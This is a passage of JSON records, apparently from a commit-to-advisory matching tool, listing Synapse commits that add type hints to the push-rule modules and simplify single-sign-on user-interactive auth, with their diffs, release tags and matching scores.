Dict, List", + "@@ -21,3 +22,5 @@ from synapse.push.rulekinds import PRIORITY_CLASS_INVERSE_MAP, PRIORITY_CLASS_MA", + "-def list_with_base_rules(rawrules, use_new_defaults=False):", + "+def list_with_base_rules(", + "+ rawrules: List[Dict[str, Any]], use_new_defaults: bool = False", + "+) -> List[Dict[str, Any]]:", + " \"\"\"Combine the list of rules set by the user with the default push rules", + "@@ -25,4 +28,4 @@ def list_with_base_rules(rawrules, use_new_defaults=False):", + " Args:", + "- rawrules(list): The rules the user has modified or set.", + "- use_new_defaults(bool): Whether to use the new experimental default rules when", + "+ rawrules: The rules the user has modified or set.", + "+ use_new_defaults: Whether to use the new experimental default rules when", + " appending or prepending default rules.", + "@@ -96,3 +99,7 @@ def list_with_base_rules(rawrules, use_new_defaults=False):", + "-def make_base_append_rules(kind, modified_base_rules, use_new_defaults=False):", + "+def make_base_append_rules(", + "+ kind: str,", + "+ modified_base_rules: Dict[str, Dict[str, Any]],", + "+ use_new_defaults: bool = False,", + "+) -> List[Dict[str, Any]]:", + " rules = []", + "@@ -118,2 +125,3 @@ def make_base_append_rules(kind, modified_base_rules, use_new_defaults=False):", + " # Only modify the actions, keep the conditions the same.", + "+ assert isinstance(r[\"rule_id\"], str)", + " modified = modified_base_rules.get(r[\"rule_id\"])", + "@@ -125,3 +133,7 @@ def make_base_append_rules(kind, modified_base_rules, use_new_defaults=False):", + "-def make_base_prepend_rules(kind, modified_base_rules, use_new_defaults=False):", + "+def make_base_prepend_rules(", + "+ kind: str,", + "+ modified_base_rules: Dict[str, Dict[str, Any]],", + "+ use_new_defaults: bool = False,", + "+) -> List[Dict[str, Any]]:", + " rules = []", + "@@ -135,2 +147,3 @@ def make_base_prepend_rules(kind, modified_base_rules, use_new_defaults=False):", + " # Only modify the actions, keep the conditions the same.", + "+ assert isinstance(r[\"rule_id\"], str)", + " modified = modified_base_rules.get(r[\"rule_id\"])", + "diff --git a/synapse/push/bulk_push_rule_evaluator.py b/synapse/push/bulk_push_rule_evaluator.py", + "index 82a72dc34..10f27e437 100644", + "--- a/synapse/push/bulk_push_rule_evaluator.py", + "+++ b/synapse/push/bulk_push_rule_evaluator.py", + "@@ -17,2 +17,3 @@", + " import logging", + "+from typing import TYPE_CHECKING, Any, Dict, List, Optional, Set, Tuple, Union", + "@@ -27,3 +28,3 @@ from synapse.state import POWER_KEY", + " from synapse.util.async_helpers import Linearizer", + "-from synapse.util.caches import register_cache", + "+from synapse.util.caches import CacheMetric, register_cache", + " from synapse.util.caches.descriptors import lru_cache", + "@@ -33,6 +34,6 @@ from .push_rule_evaluator import PushRuleEvaluatorForEvent", + "-logger = logging.getLogger(__name__)", + "-", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "-rules_by_room = {}", + "+logger = logging.getLogger(__name__)", + "@@ -103,3 +104,3 @@ class BulkPushRuleEvaluator:", + "- def __init__(self, hs):", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.hs = hs", + "@@ -115,3 +116,5 @@ class BulkPushRuleEvaluator:", + "- async def _get_rules_for_event(self, event, context):", + "+ async def _get_rules_for_event(", + "+ self, event: EventBase, context: EventContext", + "+ ) -> Dict[str, List[Dict[str, Any]]]:", + " \"\"\"This gets the rules for all users in the room at the time of the event,", + "@@ -142,7 +145,4 @@ class BulkPushRuleEvaluator:", + " @lru_cache()", + "- def _get_rules_for_room(self, room_id):", + "+ def _get_rules_for_room(self, room_id: str) -> \"RulesForRoom\":", + " \"\"\"Get the current RulesForRoom object for the given room id", + "-", + "- Returns:", + "- RulesForRoom", + " \"\"\"", + "@@ -158,3 +158,5 @@ class BulkPushRuleEvaluator:", + "- async def _get_power_levels_and_sender_level(self, event, context):", + "+ async def _get_power_levels_and_sender_level(", + "+ self, event: EventBase, context: EventContext", + "+ ) -> Tuple[dict, int]:", + " prev_state_ids = await context.get_prev_state_ids()", + "@@ -164,4 +166,3 @@ class BulkPushRuleEvaluator:", + " # not having a power level event is an extreme edge case", + "- pl_event = await self.store.get_event(pl_event_id)", + "- auth_events = {POWER_KEY: pl_event}", + "+ auth_events = {POWER_KEY: await self.store.get_event(pl_event_id)}", + " else:", + "@@ -170,4 +171,4 @@ class BulkPushRuleEvaluator:", + " )", + "- auth_events = await self.store.get_events(auth_events_ids)", + "- auth_events = {(e.type, e.state_key): e for e in auth_events.values()}", + "+ auth_events_dict = await self.store.get_events(auth_events_ids)", + "+ auth_events = {(e.type, e.state_key): e for e in auth_events_dict.values()}", + "@@ -179,3 +180,5 @@ class BulkPushRuleEvaluator:", + "- async def action_for_event_by_user(self, event, context) -> None:", + "+ async def action_for_event_by_user(", + "+ self, event: EventBase, context: EventContext", + "+ ) -> None:", + " \"\"\"Given an event and context, evaluate the push rules, check if the message", + "@@ -187,3 +190,3 @@ class BulkPushRuleEvaluator:", + " rules_by_user = await self._get_rules_for_event(event, context)", + "- actions_by_user = {}", + "+ actions_by_user = {} # type: Dict[str, List[Union[dict, str]]]", + "@@ -200,3 +203,3 @@ class BulkPushRuleEvaluator:", + "- condition_cache = {}", + "+ condition_cache = {} # type: Dict[str, bool]", + "@@ -251,3 +254,9 @@ class BulkPushRuleEvaluator:", + "-def _condition_checker(evaluator, conditions, uid, display_name, cache):", + "+def _condition_checker(", + "+ evaluator: PushRuleEvaluatorForEvent,", + "+ conditions: List[dict],", + "+ uid: str,", + "+ display_name: str,", + "+ cache: Dict[str, bool],", + "+) -> bool:", + " for cond in conditions:", + "@@ -279,3 +288,7 @@ class RulesForRoom:", + " def __init__(", + "- self, hs, room_id, rules_for_room_cache: LruCache, room_push_rule_cache_metrics", + "+ self,", + "+ hs: \"HomeServer\",", + "+ room_id: str,", + "+ rules_for_room_cache: LruCache,", + "+ room_push_rule_cache_metrics: CacheMetric,", + " ):", + "@@ -283,7 +296,7 @@ class RulesForRoom:", + " Args:", + "- hs (HomeServer)", + "- room_id (str)", + "+ hs: The HomeServer object.", + "+ room_id: The room ID.", + " rules_for_room_cache: The cache object that caches these", + " RoomsForUser objects.", + "- room_push_rule_cache_metrics (CacheMetric)", + "+ room_push_rule_cache_metrics: The metrics object", + " \"\"\"", + "@@ -296,4 +309,6 @@ class RulesForRoom:", + "- self.member_map = {} # event_id -> (user_id, state)", + "- self.rules_by_user = {} # user_id -> rules", + "+ # event_id -> (user_id, state)", + "+ self.member_map = {} # type: Dict[str, Tuple[str, str]]", + "+ # user_id -> rules", + "+ self.rules_by_user = {} # type: Dict[str, List[Dict[str, dict]]]", + "@@ -317,3 +332,3 @@ class RulesForRoom:", + " # them.", + "- self.uninteresting_user_set = set()", + "+ self.uninteresting_user_set = set() # type: Set[str]", + "@@ -327,3 +342,5 @@ class RulesForRoom:", + "- async def get_rules(self, event, context):", + "+ async def get_rules(", + "+ self, event: EventBase, context: EventContext", + "+ ) -> Dict[str, List[Dict[str, dict]]]:", + " \"\"\"Given an event context return the rules for all users who are", + "@@ -358,2 +375,4 @@ class RulesForRoom:", + " push_rules_delta_state_cache_metric.inc_misses()", + "+ # Ensure the state IDs exist.", + "+ assert current_state_ids is not None", + "@@ -422,4 +441,8 @@ class RulesForRoom:", + " async def _update_rules_with_member_event_ids(", + "- self, ret_rules_by_user, member_event_ids, state_group, event", + "- ):", + "+ self,", + "+ ret_rules_by_user: Dict[str, list],", + "+ member_event_ids: Dict[str, str],", + "+ state_group: Optional[int],", + "+ event: EventBase,", + "+ ) -> None:", + " \"\"\"Update the partially filled rules_by_user dict by fetching rules for", + "@@ -428,5 +451,5 @@ class RulesForRoom:", + " Args:", + "- ret_rules_by_user (dict): Partiallly filled dict of push rules. Gets", + "+ ret_rules_by_user: Partially filled dict of push rules. Gets", + " updated with any new rules.", + "- member_event_ids (dict): Dict of user id to event id for membership events", + "+ member_event_ids: Dict of user id to event id for membership events", + " that have happened since the last time we filled rules_by_user", + "@@ -434,2 +457,3 @@ class RulesForRoom:", + " for. Used when updating the cache.", + "+ event: The event we are currently computing push rules for.", + " \"\"\"", + "@@ -451,3 +475,3 @@ class RulesForRoom:", + "- user_ids = {", + "+ joined_user_ids = {", + " user_id", + "@@ -457,3 +481,3 @@ class RulesForRoom:", + "- logger.debug(\"Joined: %r\", user_ids)", + "+ logger.debug(\"Joined: %r\", joined_user_ids)", + "@@ -463,3 +487,3 @@ class RulesForRoom:", + " # the room. Therefore we just need to filter for local users here.", + "- user_ids = list(filter(self.is_mine_id, user_ids))", + "+ user_ids = list(filter(self.is_mine_id, joined_user_ids))", + "@@ -475,3 +499,3 @@ class RulesForRoom:", + "- def invalidate_all(self):", + "+ def invalidate_all(self) -> None:", + " # Note: Don't hand this function directly to an invalidation callback", + "@@ -487,3 +511,3 @@ class RulesForRoom:", + "- def update_cache(self, sequence, members, rules_by_user, state_group):", + "+ def update_cache(self, sequence, members, rules_by_user, state_group) -> None:", + " if sequence == self.sequence:", + "@@ -508,3 +532,3 @@ class _Invalidation:", + "- def __call__(self):", + "+ def __call__(self) -> None:", + " rules = self.cache.get(self.room_id, None, update_metrics=False)", + "diff --git a/synapse/push/clientformat.py b/synapse/push/clientformat.py", + "index a59b639f1..0cadba761 100644", + "--- a/synapse/push/clientformat.py", + "+++ b/synapse/push/clientformat.py", + "@@ -16,7 +16,9 @@", + " import copy", + "+from typing import Any, Dict, List, Optional", + " from synapse.push.rulekinds import PRIORITY_CLASS_INVERSE_MAP, PRIORITY_CLASS_MAP", + "+from synapse.types import UserID", + "-def format_push_rules_for_user(user, ruleslist):", + "+def format_push_rules_for_user(user: UserID, ruleslist) -> Dict[str, Dict[str, list]]:", + " \"\"\"Converts a list of rawrules and a enabled map into nested dictionaries", + "@@ -27,3 +29,6 @@ def format_push_rules_for_user(user, ruleslist):", + "- rules = {\"global\": {}, \"device\": {}}", + "+ rules = {", + "+ \"global\": {},", + "+ \"device\": {},", + "+ } # type: Dict[str, Dict[str, List[Dict[str, Any]]]]", + "@@ -32,4 +37,2 @@ def format_push_rules_for_user(user, ruleslist):", + " for r in ruleslist:", + "- rulearray = None", + "-", + " template_name = _priority_class_to_template_name(r[\"priority_class\"])", + "@@ -59,3 +62,3 @@ def format_push_rules_for_user(user, ruleslist):", + "-def _add_empty_priority_class_arrays(d):", + "+def _add_empty_priority_class_arrays(d: Dict[str, list]) -> Dict[str, list]:", + " for pc in PRIORITY_CLASS_MAP.keys():", + "@@ -65,3 +68,3 @@ def _add_empty_priority_class_arrays(d):", + "-def _rule_to_template(rule):", + "+def _rule_to_template(rule: Dict[str, Any]) -> Optional[Dict[str, Any]]:", + " unscoped_rule_id = None", + "@@ -84,2 +87,6 @@ def _rule_to_template(rule):", + " templaterule[\"pattern\"] = thecond[\"pattern\"]", + "+ else:", + "+ # This should not be reached unless this function is not kept in sync", + "+ # with PRIORITY_CLASS_INVERSE_MAP.", + "+ raise ValueError(\"Unexpected template_name: %s\" % (template_name,))", + "@@ -92,3 +99,3 @@ def _rule_to_template(rule):", + "-def _rule_id_from_namespaced(in_rule_id):", + "+def _rule_id_from_namespaced(in_rule_id: str) -> str:", + " return in_rule_id.split(\"/\")[-1]", + "@@ -96,3 +103,3 @@ def _rule_id_from_namespaced(in_rule_id):", + "-def _priority_class_to_template_name(pc):", + "+def _priority_class_to_template_name(pc: int) -> str:", + " return PRIORITY_CLASS_INVERSE_MAP[pc]", + "diff --git a/synapse/push/presentable_names.py b/synapse/push/presentable_names.py", + "index d8f4a453c..7e50341d7 100644", + "--- a/synapse/push/presentable_names.py", + "+++ b/synapse/push/presentable_names.py", + "@@ -17,4 +17,10 @@ import logging", + " import re", + "+from typing import TYPE_CHECKING, Dict, Iterable, Optional", + " from synapse.api.constants import EventTypes", + "+from synapse.events import EventBase", + "+from synapse.types import StateMap", + "+", + "+if TYPE_CHECKING:", + "+ from synapse.storage.databases.main import DataStore", + "@@ -30,8 +36,8 @@ ALL_ALONE = \"Empty Room\"", + " async def calculate_room_name(", + "- store,", + "- room_state_ids,", + "- user_id,", + "- fallback_to_members=True,", + "- fallback_to_single_member=True,", + "-):", + "+ store: \"DataStore\",", + "+ room_state_ids: StateMap[str],", + "+ user_id: str,", + "+ fallback_to_members: bool = True,", + "+ fallback_to_single_member: bool = True,", + "+) -> Optional[str]:", + " \"\"\"", + "@@ -41,3 +47,4 @@ async def calculate_room_name(", + " Args:", + "- room_state: Dictionary of the room's state", + "+ store: The data store to query.", + "+ room_state_ids: Dictionary of the room's state IDs.", + " user_id: The ID of the user to whom the room name is being presented", + "@@ -46,5 +53,8 @@ async def calculate_room_name(", + " title or aliases.", + "+ fallback_to_single_member: If False, return None instead of generating a", + "+ name based on the user who invited this user to the room if the room", + "+ has no title or aliases.", + " Returns:", + "- (string or None) A human readable name for the room.", + "+ A human readable name for the room, if possible.", + " \"\"\"", + "@@ -99,3 +109,3 @@ async def calculate_room_name(", + " else:", + "- return", + "+ return None", + " else:", + "@@ -152,8 +162,8 @@ async def calculate_room_name(", + " elif len(other_members) == 1 and not fallback_to_single_member:", + "- return", + "- else:", + "- return descriptor_from_member_events(other_members)", + "+ return None", + "+", + "+ return descriptor_from_member_events(other_members)", + "-def descriptor_from_member_events(member_events):", + "+def descriptor_from_member_events(member_events: Iterable[EventBase]) -> str:", + " \"\"\"Get a description of the room based on the member events.", + "@@ -161,6 +171,6 @@ def descriptor_from_member_events(member_events):", + " Args:", + "- member_events (Iterable[FrozenEvent])", + "+ member_events: The events of a room.", + " Returns:", + "- str", + "+ The room description", + " \"\"\"", + "@@ -185,3 +195,3 @@ def descriptor_from_member_events(member_events):", + "-def name_from_member_event(member_event):", + "+def name_from_member_event(member_event: EventBase) -> str:", + " if (", + "@@ -195,4 +205,4 @@ def name_from_member_event(member_event):", + "-def _state_as_two_level_dict(state):", + "- ret = {}", + "+def _state_as_two_level_dict(state: StateMap[str]) -> Dict[str, Dict[str, str]]:", + "+ ret = {} # type: Dict[str, Dict[str, str]]", + " for k, v in state.items():", + "@@ -202,3 +212,3 @@ def _state_as_two_level_dict(state):", + "-def _looks_like_an_alias(string):", + "+def _looks_like_an_alias(string: str) -> bool:", + " return ALIAS_RE.match(string) is not None", + "diff --git a/synapse/push/push_rule_evaluator.py b/synapse/push/push_rule_evaluator.py", + "index 2ce9e444a..ba1877adc 100644", + "--- a/synapse/push/push_rule_evaluator.py", + "+++ b/synapse/push/push_rule_evaluator.py", + "@@ -32,3 +32,5 @@ INEQUALITY_EXPR = re.compile(\"^([=<>]*)([0-9]*)$\")", + "-def _room_member_count(ev, condition, room_member_count):", + "+def _room_member_count(", + "+ ev: EventBase, condition: Dict[str, Any], room_member_count: int", + "+) -> bool:", + " return _test_ineq_condition(condition, room_member_count)", + "@@ -36,3 +38,8 @@ def _room_member_count(ev, condition, room_member_count):", + "-def _sender_notification_permission(ev, condition, sender_power_level, power_levels):", + "+def _sender_notification_permission(", + "+ ev: EventBase,", + "+ condition: Dict[str, Any],", + "+ sender_power_level: int,", + "+ power_levels: Dict[str, Union[int, Dict[str, int]]],", + "+) -> bool:", + " notif_level_key = condition.get(\"key\")", + "@@ -42,2 +49,3 @@ def _sender_notification_permission(ev, condition, sender_power_level, power_lev", + " notif_levels = power_levels.get(\"notifications\", {})", + "+ assert isinstance(notif_levels, dict)", + " room_notif_level = notif_levels.get(notif_level_key, 50)", + "@@ -47,3 +55,3 @@ def _sender_notification_permission(ev, condition, sender_power_level, power_lev", + "-def _test_ineq_condition(condition, number):", + "+def _test_ineq_condition(condition: Dict[str, Any], number: int) -> bool:", + " if \"is\" not in condition:", + "@@ -112,3 +120,3 @@ class PushRuleEvaluatorForEvent:", + " sender_power_level: int,", + "- power_levels: dict,", + "+ power_levels: Dict[str, Union[int, Dict[str, int]]],", + " ):", + "@@ -122,3 +130,5 @@ class PushRuleEvaluatorForEvent:", + "- def matches(self, condition: dict, user_id: str, display_name: str) -> bool:", + "+ def matches(", + "+ self, condition: Dict[str, Any], user_id: str, display_name: str", + "+ ) -> bool:", + " if condition[\"kind\"] == \"event_match\":", + "@@ -263,3 +273,9 @@ def _re_word_boundary(r: str) -> str:", + "-def _flatten_dict(d, prefix=[], result=None):", + "+def _flatten_dict(", + "+ d: Union[EventBase, dict],", + "+ prefix: Optional[List[str]] = None,", + "+ result: Optional[Dict[str, str]] = None,", + "+) -> Dict[str, str]:", + "+ if prefix is None:", + "+ prefix = []", + " if result is None:" + ], + "changed_files": [ + "changelog.d/8901.misc", + "mypy.ini", + "scripts-dev/mypy_synapse_plugin.py", + "synapse/push/action_generator.py", + "synapse/push/baserules.py", + "synapse/push/bulk_push_rule_evaluator.py", + "synapse/push/clientformat.py", + "synapse/push/presentable_names.py", + "synapse/push/push_rule_evaluator.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8901": "Convert internal pusher dicts to attrs #8940" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8901, 8901", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8901", + "relevance": 2 + } + ] + }, + { + "commit_id": "36ba73f53d9919c7639d4c7269fabdb1857fb7a1", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607436218, + "hunks": 29, + "message": "Simplify the flow for SSO UIA (#8881) * SsoHandler: remove inheritance from BaseHandler * Simplify the flow for SSO UIA We don't need to do all the magic for mapping users when we are doing UIA, so let's factor that out.", + "diff": [ + "diff --git a/changelog.d/8881.misc b/changelog.d/8881.misc", + "new file mode 100644", + "index 000000000..07d3f30fb", + "--- /dev/null", + "+++ b/changelog.d/8881.misc", + "@@ -0,0 +1 @@", + "+Simplify logic for handling user-interactive-auth via single-sign-on servers.", + "diff --git a/mypy.ini b/mypy.ini", + "index 59144be46..12408b8d9 100644", + "--- a/mypy.ini", + "+++ b/mypy.ini", + "@@ -45,2 +45,3 @@ files =", + " synapse/handlers/saml_handler.py,", + "+ synapse/handlers/sso.py,", + " synapse/handlers/sync.py,", + "diff --git a/synapse/handlers/_base.py b/synapse/handlers/_base.py", + "index bb81c0e81..d29b066a5 100644", + "--- a/synapse/handlers/_base.py", + "+++ b/synapse/handlers/_base.py", + "@@ -34,2 +34,6 @@ class BaseHandler:", + " Common base class for the event handlers.", + "+", + "+ Deprecated: new code should not use this. Instead, Handler classes should define the", + "+ fields they actually need. The utility methods should either be factored out to", + "+ standalone helper functions, or to different Handler classes.", + " \"\"\"", + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index 2e72298e0..afae6d327 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -38,2 +38,4 @@ import pymacaroons", + "+from twisted.web.http import Request", + "+", + " from synapse.api.constants import LoginType", + "@@ -1333,3 +1335,3 @@ class AuthHandler(BaseHandler):", + " async def complete_sso_ui_auth(", + "- self, registered_user_id: str, session_id: str, request: SynapseRequest,", + "+ self, registered_user_id: str, session_id: str, request: Request,", + " ):", + "@@ -1339,5 +1341,4 @@ class AuthHandler(BaseHandler):", + " registered_user_id: The registered user ID to complete SSO login for.", + "+ session_id: The ID of the user-interactive auth session.", + " request: The request to complete.", + "- client_redirect_url: The URL to which to redirect the user at the end of the", + "- process.", + " \"\"\"", + "@@ -1357,3 +1358,3 @@ class AuthHandler(BaseHandler):", + " registered_user_id: str,", + "- request: SynapseRequest,", + "+ request: Request,", + " client_redirect_url: str,", + "@@ -1385,3 +1386,3 @@ class AuthHandler(BaseHandler):", + " registered_user_id: str,", + "- request: SynapseRequest,", + "+ request: Request,", + " client_redirect_url: str,", + "diff --git a/synapse/handlers/oidc_handler.py b/synapse/handlers/oidc_handler.py", + "index c605f7082..f626117f7 100644", + "--- a/synapse/handlers/oidc_handler.py", + "+++ b/synapse/handlers/oidc_handler.py", + "@@ -676,2 +676,17 @@ class OidcHandler(BaseHandler):", + "+ # first check if we're doing a UIA", + "+ if ui_auth_session_id:", + "+ try:", + "+ remote_user_id = self._remote_id_from_userinfo(userinfo)", + "+ except Exception as e:", + "+ logger.exception(\"Could not extract remote user id\")", + "+ self._sso_handler.render_error(request, \"mapping_error\", str(e))", + "+ return", + "+", + "+ return await self._sso_handler.complete_sso_ui_auth_request(", + "+ self._auth_provider_id, remote_user_id, ui_auth_session_id, request", + "+ )", + "+", + "+ # otherwise, it's a login", + "+", + " # Pull out the user-agent and IP from the request.", + "@@ -700,10 +715,5 @@ class OidcHandler(BaseHandler):", + " # and finally complete the login", + "- if ui_auth_session_id:", + "- await self._auth_handler.complete_sso_ui_auth(", + "- user_id, ui_auth_session_id, request", + "- )", + "- else:", + "- await self._auth_handler.complete_sso_login(", + "- user_id, request, client_redirect_url, extra_attributes", + "- )", + "+ await self._auth_handler.complete_sso_login(", + "+ user_id, request, client_redirect_url, extra_attributes", + "+ )", + "@@ -858,3 +868,3 @@ class OidcHandler(BaseHandler):", + " try:", + "- remote_user_id = self._user_mapping_provider.get_remote_user_id(userinfo)", + "+ remote_user_id = self._remote_id_from_userinfo(userinfo)", + " except Exception as e:", + "@@ -863,5 +873,2 @@ class OidcHandler(BaseHandler):", + " )", + "- # Some OIDC providers use integer IDs, but Synapse expects external IDs", + "- # to be strings.", + "- remote_user_id = str(remote_user_id)", + "@@ -935,2 +942,15 @@ class OidcHandler(BaseHandler):", + "+ def _remote_id_from_userinfo(self, userinfo: UserInfo) -> str:", + "+ \"\"\"Extract the unique remote id from an OIDC UserInfo block", + "+", + "+ Args:", + "+ userinfo: An object representing the user given by the OIDC provider", + "+ Returns:", + "+ remote user id", + "+ \"\"\"", + "+ remote_user_id = self._user_mapping_provider.get_remote_user_id(userinfo)", + "+ # Some OIDC providers use integer IDs, but Synapse expects external IDs", + "+ # to be strings.", + "+ return str(remote_user_id)", + "+", + "diff --git a/synapse/handlers/saml_handler.py b/synapse/handlers/saml_handler.py", + "index 76d4169fe..5846f0860 100644", + "--- a/synapse/handlers/saml_handler.py", + "+++ b/synapse/handlers/saml_handler.py", + "@@ -185,2 +185,20 @@ class SamlHandler(BaseHandler):", + "+ # first check if we're doing a UIA", + "+ if current_session and current_session.ui_auth_session_id:", + "+ try:", + "+ remote_user_id = self._remote_id_from_saml_response(saml2_auth, None)", + "+ except MappingException as e:", + "+ logger.exception(\"Failed to extract remote user id from SAML response\")", + "+ self._sso_handler.render_error(request, \"mapping_error\", str(e))", + "+ return", + "+", + "+ return await self._sso_handler.complete_sso_ui_auth_request(", + "+ self._auth_provider_id,", + "+ remote_user_id,", + "+ current_session.ui_auth_session_id,", + "+ request,", + "+ )", + "+", + "+ # otherwise, we're handling a login request.", + "+", + " # Ensure that the attributes of the logged in user meet the required", + "@@ -208,10 +226,3 @@ class SamlHandler(BaseHandler):", + "- # Complete the interactive auth session or the login.", + "- if current_session and current_session.ui_auth_session_id:", + "- await self._auth_handler.complete_sso_ui_auth(", + "- user_id, current_session.ui_auth_session_id, request", + "- )", + "-", + "- else:", + "- await self._auth_handler.complete_sso_login(user_id, request, relay_state)", + "+ await self._auth_handler.complete_sso_login(user_id, request, relay_state)", + "@@ -241,4 +252,3 @@ class SamlHandler(BaseHandler):", + " \"\"\"", + "-", + "- remote_user_id = self._user_mapping_provider.get_remote_user_id(", + "+ remote_user_id = self._remote_id_from_saml_response(", + " saml2_auth, client_redirect_url", + "@@ -246,7 +256,2 @@ class SamlHandler(BaseHandler):", + "- if not remote_user_id:", + "- raise MappingException(", + "- \"Failed to extract remote user id from SAML response\"", + "- )", + "-", + " async def saml_response_to_remapped_user_attributes(", + "@@ -306,2 +311,31 @@ class SamlHandler(BaseHandler):", + "+ def _remote_id_from_saml_response(", + "+ self,", + "+ saml2_auth: saml2.response.AuthnResponse,", + "+ client_redirect_url: Optional[str],", + "+ ) -> str:", + "+ \"\"\"Extract the unique remote id from a SAML2 AuthnResponse", + "+", + "+ Args:", + "+ saml2_auth: The parsed SAML2 response.", + "+ client_redirect_url: The redirect URL passed in by the client.", + "+ Returns:", + "+ remote user id", + "+", + "+ Raises:", + "+ MappingException if there was an error extracting the user id", + "+ \"\"\"", + "+ # It's not obvious why we need to pass in the redirect URI to the mapping", + "+ # provider, but we do :/", + "+ remote_user_id = self._user_mapping_provider.get_remote_user_id(", + "+ saml2_auth, client_redirect_url", + "+ )", + "+", + "+ if not remote_user_id:", + "+ raise MappingException(", + "+ \"Failed to extract remote user id from SAML response\"", + "+ )", + "+", + "+ return remote_user_id", + "+", + " def expire_sessions(self):", + "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", + "index 47ad96f97..e24767b92 100644", + "--- a/synapse/handlers/sso.py", + "+++ b/synapse/handlers/sso.py", + "@@ -19,4 +19,5 @@ import attr", + "+from twisted.web.http import Request", + "+", + " from synapse.api.errors import RedirectException", + "-from synapse.handlers._base import BaseHandler", + " from synapse.http.server import respond_with_html", + "@@ -44,3 +45,3 @@ class 